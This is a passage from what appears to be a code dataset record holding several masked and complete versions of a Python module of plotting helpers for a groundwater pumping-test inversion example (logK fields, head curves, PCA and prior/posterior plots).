ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-2": "<mask token>\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block * num_block * 2):\n d_vis[np.where(G[i, :] > 0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x, num_y)\n return d_vis\n\n\n<mask token>\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\n<mask token>\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\n<mask token>\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_mean_var_MC(m, start_loc, num_grid, vmin=-3, vmax=1, vmin_var\n =0, vmax_var=0.2, cmap='viridis', rect=False):\n mu = np.mean(m, axis=0)\n var = np.var(m, axis=0)\n plt.figure(figsize=[10, 4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n ax.scatter(well_location[0], well_location[1], s=20, color='black',\n label='pumping well')\n direct_data_loc = [30, 70]\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color='red',\n label='direct logK')\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap='magma',\n vmin=vmin_var, vmax=vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-3": "<mask token>\nplt.rcParams.update({'font.size': 15})\n<mask token>\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block * num_block * 2):\n d_vis[np.where(G[i, :] > 0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x, num_y)\n return d_vis\n\n\ndef visualize_one_d(d):\n plt.plot(np.arange(70) / 10, d.reshape(70, 1)[:, 0], label='pumping well')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\ndef print_theta_multiple(theta, name='theta', head=8):\n theta_pd = pd.DataFrame(theta, index=[('theta_' + str(i)) for i in np.\n arange(1, theta.shape[0] + 1)], columns=['mean', 'variance',\n 'max_range', 'min_range', 'anisotropy', 'head_west'])\n print(theta_pd.head(head))\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\ndef visualize_multiple_pc(m, PCA, head=8, vmin=-4, vmax=0, cmap='viridis',\n rect=False):\n plt.figure(figsize=[25, 10])\n for i in np.arange(head):\n ax = plt.subplot(1, 10, i + 1)\n ax.imshow(m[i, :].reshape(num_x, num_y).T, origin='lower', cmap=\n cmap, vmin=vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((32, 32), 36, 36, linewidth=2,\n linestyle='dashed', edgecolor='black', facecolor='None')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('PCA ' + str(i + 1) + ': ' + str(np.int(PCA[\n 'explained_variance'][i] * 100)) + '%')\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_mean_var_MC(m, start_loc, num_grid, vmin=-3, vmax=1, vmin_var\n =0, vmax_var=0.2, cmap='viridis', rect=False):\n mu = np.mean(m, axis=0)\n var = np.var(m, axis=0)\n plt.figure(figsize=[10, 4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n ax.scatter(well_location[0], well_location[1], s=20, color='black',\n label='pumping well')\n direct_data_loc = [30, 70]\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color='red',\n label='direct logK')\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap='magma',\n vmin=vmin_var, vmax=vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport gstools as gs\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nimport seaborn as sns\nplt.rcParams.update({'font.size': 15})\nimport os\npath = os.path.dirname(os.getcwd())\nsubpath = '/examples/case2_nonlinear_forward_pumping_test/'\nnum_prior_sample = 5000\nnum_x = 100\nnum_y = 100\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block * num_block * 2):\n d_vis[np.where(G[i, :] > 0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x, num_y)\n return d_vis\n\n\ndef visualize_one_d(d):\n plt.plot(np.arange(70) / 10, d.reshape(70, 1)[:, 0], label='pumping well')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\ndef print_theta_multiple(theta, name='theta', head=8):\n theta_pd = pd.DataFrame(theta, index=[('theta_' + str(i)) for i in np.\n arange(1, theta.shape[0] + 1)], columns=['mean', 'variance',\n 'max_range', 'min_range', 'anisotropy', 'head_west'])\n print(theta_pd.head(head))\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\ndef visualize_multiple_pc(m, PCA, head=8, vmin=-4, vmax=0, cmap='viridis',\n rect=False):\n plt.figure(figsize=[25, 10])\n for i in np.arange(head):\n ax = plt.subplot(1, 10, i + 1)\n ax.imshow(m[i, :].reshape(num_x, num_y).T, origin='lower', cmap=\n cmap, vmin=vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((32, 32), 36, 36, linewidth=2,\n linestyle='dashed', edgecolor='black', facecolor='None')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('PCA ' + str(i + 1) + ': ' + str(np.int(PCA[\n 'explained_variance'][i] * 100)) + '%')\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_mean_var_MC(m, start_loc, num_grid, vmin=-3, vmax=1, vmin_var\n =0, vmax_var=0.2, cmap='viridis', rect=False):\n mu = np.mean(m, axis=0)\n var = np.var(m, axis=0)\n plt.figure(figsize=[10, 4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n ax.scatter(well_location[0], well_location[1], s=20, color='black',\n label='pumping well')\n direct_data_loc = [30, 70]\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color='red',\n label='direct logK')\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap='magma',\n vmin=vmin_var, vmax=vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-5": "# Author: Lijing Wang ([email protected]), 2021\n\nimport numpy as np\nimport pandas as pd\nimport gstools as gs\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nimport seaborn as sns\nplt.rcParams.update({'font.size': 15})\n\nimport os\npath = os.path.dirname(os.getcwd()) \n\nsubpath = '/examples/case2_nonlinear_forward_pumping_test/'\n\nnum_prior_sample = 5000\nnum_x = 100\nnum_y = 100\n\ndef print_theta(theta, name = 'theta'):\n theta_pd = pd.DataFrame(theta.reshape(1,-1), index = [name], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block*num_block*2):\n d_vis[np.where(G[i,:]>0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x,num_y)\n return d_vis\n\ndef visualize_one_d(d):\n plt.plot(np.arange(70)/10, d.reshape(70,1)[:,0],label = 'pumping well')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n\ndef visualize_one_m(m, vmin = -4, vmax = 0, cmap = 'viridis',title = 'True spatial field, m'):\n fig, ax = plt.subplots(figsize = [6,6])\n m_show = ax.imshow(m.T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title,fontsize = 13)\n \n well_location = [49,49]\n direct_data_loc = [30,70]\n ax.scatter(well_location[0],well_location[1],s = 100, color = 'black', label = 'indirect pumping well')\n ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 100, color = 'red', label = 'direct logK')\n ax.legend()\n fig.colorbar(m_show, ax = ax, shrink = 0.6)\n\ndef print_theta_multiple(theta, name = 'theta',head = 8):\n theta_pd = pd.DataFrame(theta, index = ['theta_'+str(i) for i in np.arange(1,theta.shape[0]+1)], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])\n print(theta_pd.head(head))\n\ndef visualize_multiple_m(m, head = 4, vmin = -4, vmax = 0, cmap = 'viridis', theta = None):\n plt.figure(figsize = [20,8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i+1)\n ax.imshow(m[i,:,:].T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49,49]\n direct_data_loc = [30,70]\n ax.scatter(well_location[0],well_location[1],s = 50, color = 'black', label = 'pumping well')\n ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')\n if theta is not None: \n ax.set_title('\\u03B8 = '+str(tuple(np.round(theta[i,:],1))))\n\ndef visualize_multiple_pc(m, PCA, head = 8, vmin = -4, vmax = 0, cmap = 'viridis',rect = False):\n plt.figure(figsize = [25,10])\n for i in np.arange(head):\n ax = plt.subplot(1, 10, i+1)\n ax.imshow(m[i,:].reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n if rect:\n rect = patches.Rectangle((32,32),36, 36, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('PCA '+str(i+1)+': '+str(np.int(PCA['explained_variance'][i]*100))+'%')\n\ndef visualize_multiple_d(d, head = 4):\n plt.figure(figsize = [25,3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i+1)\n ax.plot(np.arange(70)/10, d[:,i].reshape(70,1)[:,0],label = 'pumping well')\n #ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,1],label = 'obs well: SW')\n #ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,2],label = 'obs well: NE')\n ##ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,3],label = 'obs well: NW')\n #ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,4],label = 'obs well: SE')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n #ax.legend()\n\ndef colors_from_values(values, palette_name):\n # normalize the values to range [0, 1]\n normalized = (values - min(values)) / (max(values) - min(values))\n # convert to indices\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n # use the indices to get the colors\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\ndef visualize_mean_var(mu, covariance, vmin = 20, vmax = 40, cmap = 'viridis'):\n var = np.diag(covariance)\n plt.figure(figsize = [18,4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = 0, vmax = 16)\n rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n rect = 